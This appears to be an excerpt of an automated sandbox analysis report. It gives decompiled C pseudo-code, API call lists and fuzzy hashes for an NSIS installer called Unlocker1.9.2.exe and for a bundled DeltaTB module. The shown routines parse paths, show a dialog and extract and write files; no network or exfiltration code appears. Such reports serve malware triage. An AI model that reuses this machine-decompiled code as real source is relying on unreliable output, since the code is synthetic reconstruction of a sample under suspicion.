                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                                                              • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                                                                • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1404258612-0
                                                                                                                                                              • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                                                              • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                                                                                                                                              • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                                                              • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405564(CHAR* _a4) {
                                                                                                                                                              				CHAR* _t3;
                                                                                                                                                              				char* _t5;
                                                                                                                                                              				CHAR* _t7;
                                                                                                                                                              				CHAR* _t8;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              
                                                                                                                                                              				_t8 = _a4;
                                                                                                                                                              				_t7 = CharNextA(_t8);
                                                                                                                                                              				_t3 = CharNextA(_t7);
                                                                                                                                                              				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                                                                                                              					if( *_t8 != 0x5c5c) {
                                                                                                                                                              						L8:
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t10 = 2;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t10 = _t10 - 1;
                                                                                                                                                              						_t5 = E004054FB(_t3, 0x5c);
                                                                                                                                                              						if( *_t5 == 0) {
                                                                                                                                                              							goto L8;
                                                                                                                                                              						}
                                                                                                                                                              						_t3 = _t5 + 1;
                                                                                                                                                              						if(_t10 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						return _t3;
                                                                                                                                                              					}
                                                                                                                                                              					goto L8;
                                                                                                                                                              				} else {
                                                                                                                                                              					return CharNextA(_t3);
                                                                                                                                                              				}
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(00405316,?,C:\,00000000,004055C8,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405572
                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405577
                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405586
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext
                                                                                                                                                              • String ID: C:\
                                                                                                                                                              • API String ID: 3213498283-3404278061
                                                                                                                                                              • Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
                                                                                                                                                              • Instruction ID: fce001944c357d5a5f397a5c884fddf1ab35f0ab5fed97c3c123c2792e791524
                                                                                                                                                              • Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
                                                                                                                                                              • Instruction Fuzzy Hash: D7F0A751905A2179E72262A88C44B7B57ADDB55721F140437E500F61D582BC4C838FEA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402BBE(intOrPtr _a4) {
                                                                                                                                                              				long _t2;
                                                                                                                                                              				struct HWND__* _t3;
                                                                                                                                                              				struct HWND__* _t6;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					__eflags =  *0x417020; // 0x0
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						_t2 = GetTickCount();
                                                                                                                                                              						__eflags = _t2 -  *0x423e8c;
                                                                                                                                                              						if(_t2 >  *0x423e8c) {
                                                                                                                                                              							_t3 = CreateDialogParamA( *0x423e80, 0x6f, 0, E00402B3B, 0);
                                                                                                                                                              							 *0x417020 = _t3;
                                                                                                                                                              							return ShowWindow(_t3, 5);
                                                                                                                                                              						}
                                                                                                                                                              						return _t2;
                                                                                                                                                              					} else {
                                                                                                                                                              						return E00405D38(0);
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t6 =  *0x417020; // 0x0
                                                                                                                                                              					if(_t6 != 0) {
                                                                                                                                                              						_t6 = DestroyWindow(_t6);
                                                                                                                                                              					}
                                                                                                                                                              					 *0x417020 = 0;
                                                                                                                                                              					return _t6;
                                                                                                                                                              				}
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402BEF
                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                              • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                                                              • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                                                                                                                                              • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                                                                                              				int _t5;
                                                                                                                                                              				long _t7;
                                                                                                                                                              				struct _OVERLAPPED* _t11;
                                                                                                                                                              				intOrPtr* _t15;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				int _t21;
                                                                                                                                                              
                                                                                                                                                              				_t15 = __esi;
                                                                                                                                                              				_t11 = __ebx;
                                                                                                                                                              				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                                                                                                              					_t7 = lstrlenA(E004029F6(0x11));
                                                                                                                                                              				} else {
                                                                                                                                                              					E004029D9(1);
                                                                                                                                                              					 *0x409f50 = __al;
                                                                                                                                                              				}
                                                                                                                                                              				if( *_t15 == _t11) {
                                                                                                                                                              					L8:
                                                                                                                                                              					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t5 = WriteFile(E00405954(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll", _t7, _t17 + 8, _t11);
                                                                                                                                                              					_t21 = _t5;
                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                              						goto L8;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll, xrefs: 004024CA, 004024EF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWritelstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll
                                                                                                                                                              • API String ID: 427699356-4254672603
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405517(char* _a4) {
                                                                                                                                                              				char* _t3;
                                                                                                                                                              				char* _t5;
                                                                                                                                                              
                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                              				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                                                              				while( *_t3 != 0x5c) {
                                                                                                                                                              					_t3 = CharPrevA(_t5, _t3);
                                                                                                                                                              					if(_t3 > _t5) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                              				return  &(_t3[1]);
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Unlocker1.9.2.exe,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 0040551D
                                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Unlocker1.9.2.exe,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 0040552B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                                              • API String ID: 2709904686-224404859
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405629(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                              				int _t10;
                                                                                                                                                              				int _t15;
                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                              
                                                                                                                                                              				_t15 = lstrlenA(_a8);
                                                                                                                                                              				_t16 = _a4;
                                                                                                                                                              				while(lstrlenA(_t16) >= _t15) {
                                                                                                                                                              					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                                                                                              					_t10 = lstrcmpiA(_t16, _a8);
                                                                                                                                                              					if(_t10 == 0) {
                                                                                                                                                              						return _t16;
                                                                                                                                                              					}
                                                                                                                                                              					_t16 = CharNextA(_t16);
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405649
                                                                                                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:29.5%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:6.6%
                                                                                                                                                              Total number of Nodes:136
                                                                                                                                                              Total number of Limit Nodes:1

Callgraph (graph not reproduced; legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available)

Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)
                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E009A121F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				char _v540;
                                                                                                                                                              				char _v1068;
                                                                                                                                                              				struct _WIN32_FIND_DATAW _v1660;
                                                                                                                                                              				intOrPtr _v1664;
                                                                                                                                                              				intOrPtr _v1668;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed int _t23;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				void* _t54;
                                                                                                                                                              				void* _t55;
                                                                                                                                                              				WCHAR* _t57;
                                                                                                                                                              				void* _t58;
                                                                                                                                                              				signed int _t59;
                                                                                                                                                              				signed int _t61;
                                                                                                                                                              
                                                                                                                                                              				_t61 = (_t59 & 0xfffffff8) - 0x67c;
                                                                                                                                                              				_v8 =  *0x9a5000 ^ _t61;
                                                                                                                                                              				_t38 = __edx;
                                                                                                                                                              				_v1664 = _a4;
                                                                                                                                                              				_t54 = __ecx;
                                                                                                                                                              				E009A3C02( &_v1068, __edx);
                                                                                                                                                              				_t52 =  &_v1068;
                                                                                                                                                              				_t23 = E009A1718(L".dll,",  &_v1068);
                                                                                                                                                              				if(_t23 != 0xffffffff) {
                                                                                                                                                              					 *((short*)(_t61 + 0x268 + _t23 * 2)) = 0;
                                                                                                                                                              				}
                                                                                                                                                              				E009A3C02( &_v540, _t54 + 0x44);
                                                                                                                                                              				_t57 =  &_v540;
                                                                                                                                                              				E009A221A(_t57);
                                                                                                                                                              				E009A3BD4(_t57,  &_v1068);
                                                                                                                                                              				_t33 = FindFirstFileW(_t57,  &_v1660);
                                                                                                                                                              				_t65 = _t33 - 0xffffffff;
                                                                                                                                                              				if(_t33 == 0xffffffff) {
                                                                                                                                                              					_t34 = 5;
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(_t54 + 0x34))(_t33);
                                                                                                                                                              					_t34 = E009A10D8(_t38, _t54, _t65, _v1668);
                                                                                                                                                              				}
                                                                                                                                                              				_pop(_t55);
                                                                                                                                                              				_pop(_t58);
                                                                                                                                                              				_pop(_t39);
                                                                                                                                                              				return E009A3BC5(_t34, _t39, _v8 ^ _t61, _t52, _t55, _t58);
                                                                                                                                                              			}























                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscpy$FileFindFirst_wcscat
                                                                                                                                                              • String ID: .dll,$setup.exe
                                                                                                                                                              • API String ID: 2931365424-1808119565
                                                                                                                                                              • Opcode ID: 13a93b0c1a2d363a64ad0b7da053c1d3a7a9c98b456ce71bb8732e22e544a326
                                                                                                                                                              • Instruction ID: 6985b598b0851a13d65324fcf39ea046092731655737168dfe80ed8c7e850402
                                                                                                                                                              • Opcode Fuzzy Hash: 13a93b0c1a2d363a64ad0b7da053c1d3a7a9c98b456ce71bb8732e22e544a326
                                                                                                                                                              • Instruction Fuzzy Hash: 9E11547210C2045BC724EA689C4AA9BB7DDEFC9330F104A1BF569C2590EF31A51487D5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E009A1985(signed int* __ecx, intOrPtr __edx, WCHAR* _a4, char _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				short _v540;
                                                                                                                                                              				intOrPtr _v544;
                                                                                                                                                              				long _v548;
                                                                                                                                                              				struct _FILETIME _v556;
                                                                                                                                                              				intOrPtr _v560;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				int _t36;
                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                              				int _t41;
                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                              				int _t49;
                                                                                                                                                              				WCHAR* _t51;
                                                                                                                                                              				int _t59;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                              				char* _t72;
                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                              				WCHAR* _t74;
                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                              				signed int _t77;
                                                                                                                                                              
                                                                                                                                                              				_t73 = __edx;
                                                                                                                                                              				_v8 =  *0x9a5000 ^ _t77;
                                                                                                                                                              				_t74 = _a4;
                                                                                                                                                              				_t76 = __ecx;
                                                                                                                                                              				if(_a8 != 0) {
                                                                                                                                                              					 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                              				}
                                                                                                                                                              				if(GetCurrentDirectoryW(0x104,  &_v540) != 0) {
                                                                                                                                                              					_t36 = SetCurrentDirectoryW(_t74); // executed
                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                              						goto L3;
                                                                                                                                                              					} else {
                                                                                                                                                              						while(1) {
                                                                                                                                                              							_t39 =  *_t76;
                                                                                                                                                              							if(_t39 >=  *((intOrPtr*)(_t76 + 4))) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_t67 =  *((intOrPtr*)(_t76 + 8));
                                                                                                                                                              							_t74 =  *(_t67 + _t39);
                                                                                                                                                              							_t42 = _t39 + 4;
                                                                                                                                                              							 *_t76 = _t42;
                                                                                                                                                              							_v548 = _t74;
                                                                                                                                                              							_t73 =  *((intOrPtr*)(_t42 + _t67));
                                                                                                                                                              							_t43 = _t42 + 4;
                                                                                                                                                              							_v560 = _t73;
                                                                                                                                                              							 *_t76 = _t43;
                                                                                                                                                              							if(_t73 == 2) {
                                                                                                                                                              								break;
                                                                                                                                                              							} else {
                                                                                                                                                              								if(_t73 == 0 &&  *((intOrPtr*)(_t76 + 0xc)) > 1) {
                                                                                                                                                              									_v544 = _t67 + _t43;
                                                                                                                                                              									_v544 = _v544 -  &_v556;
                                                                                                                                                              									do {
                                                                                                                                                              										_t72 = _t77 + _t73 - 0x228;
                                                                                                                                                              										_t73 = _t73 + 1;
                                                                                                                                                              										 *_t72 =  *((intOrPtr*)(_v544 + _t72));
                                                                                                                                                              									} while (_t73 < 8);
                                                                                                                                                              									 *_t76 = _t43 + 8;
                                                                                                                                                              								}
                                                                                                                                                              								_t61 =  *_t76;
                                                                                                                                                              								 *_t76 = _t61 + _t74;
                                                                                                                                                              								E009A17DD(_t76);
                                                                                                                                                              								_t74 =  *_t76 +  *((intOrPtr*)(_t76 + 8));
                                                                                                                                                              								 *_t76 =  *_t76 + E009A3CA2(_t74) + _t46 + 2;
                                                                                                                                                              								E009A17DD(_t76);
                                                                                                                                                              								if(_v560 != 1) {
                                                                                                                                                              									_t49 = DeleteFileW(_t74); // executed
                                                                                                                                                              									if(_t49 != 0 || GetLastError() == 2) {
                                                                                                                                                              										_t51 = CreateFileW(_t74, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                                                                              										_t74 = _t51;
                                                                                                                                                              										if(_t74 == 0xffffffff) {
                                                                                                                                                              											_t37 = 9;
                                                                                                                                                              										} else {
                                                                                                                                                              											WriteFile(_t74,  *((intOrPtr*)(_t76 + 8)) + _t61, _v548,  &_v548, 0); // executed
                                                                                                                                                              											if( *((intOrPtr*)(_t76 + 0xc)) > 1) {
                                                                                                                                                              												SetFileTime(_t74,  &_v556,  &_v556,  &_v556); // executed
                                                                                                                                                              											}
                                                                                                                                                              											FindCloseChangeNotification(_t74); // executed
                                                                                                                                                              											continue;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									_t59 = CreateDirectoryW(_t74, 0); // executed
                                                                                                                                                              									if(_t59 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                              										_t37 = E009A1985(_t76, _t73, _t74, 0); // executed
                                                                                                                                                              										if(_t37 == 0) {
                                                                                                                                                              											continue;
                                                                                                                                                              										} else {
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							goto L26;
                                                                                                                                                              						}
                                                                                                                                                              						_t41 = SetCurrentDirectoryW( &_v540); // executed
                                                                                                                                                              						if(_t41 == 0) {
                                                                                                                                                              							goto L3;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t37 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					L3:
                                                                                                                                                              					_t37 = GetLastError();
                                                                                                                                                              				}
                                                                                                                                                              				L26:
                                                                                                                                                              				return E009A3BC5(_t37, _t61, _v8 ^ _t77, _t73, _t74, _t76);
                                                                                                                                                              			}




























                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 009A19B5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A19BF
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A19CB
                                                                                                                                                              • _wcslen.LIBCMT ref: 009A1A55
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 009A1A72
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A1A7C
                                                                                                                                                              • DeleteFileW.KERNELBASE(?), ref: 009A1AA5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A1AAF
                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 009A1ACC
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000), ref: 009A1AEF
                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 009A1B05
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009A1B0C
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A1B23
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryFile$CurrentErrorLast$Create$ChangeCloseDeleteFindNotificationTimeWrite_wcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 113073435-0
